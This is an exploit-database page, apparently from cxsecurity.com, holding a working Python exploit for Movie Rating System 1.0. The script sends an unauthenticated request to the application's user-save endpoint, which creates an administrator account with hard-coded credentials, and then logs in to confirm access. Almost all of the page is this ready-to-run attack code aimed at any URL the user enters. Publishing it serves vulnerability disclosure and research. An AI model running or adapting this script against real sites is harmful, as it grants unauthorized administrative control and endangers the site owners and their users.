Movie Rating System 1.0 Broken Access Control (Admin Account Creation) (Unauthenticated)

2022.01.10
Credit: Tagoletta
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated) # Date: 22/12/2021 # Exploit Author: Tagoletta (Tağmaç) # Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html # Version: 1.0 # Tested on: Windows import requests import json url = input('Url:') if not url.startswith('http://') and not url.startswith('https://'): url = "http://" + url if not url.endswith('/'): url = url + "/" Username = "tago" Password = "tagoletta" reqUrl = url + "classes/Users.php?f=save" reqHeaders = { "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryTagmac", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Origin": url} reqData = "------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nTago\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nLetta\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+Username+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n"+Password+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n1\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryTagmac--\r\n" resp = requests.post(reqUrl, headers=reqHeaders, data=reqData) if resp.status_code == 200: print("Admin account created") reqUrl = url + "classes/Login.php?f=login" reqHeaders = { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Origin": url } reqData = {"username": ""+Username+"", "password": ""+Password+""} resp = requests.post(reqUrl, headers=reqHeaders, data=reqData) data = json.loads(resp.text) status = data["status"] if status == "success": print("Login Successfully\nUsername:"+ Username+"\nPassword:"+Password) else: print("Exploited but not loginned") else: print("Not injectable")


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top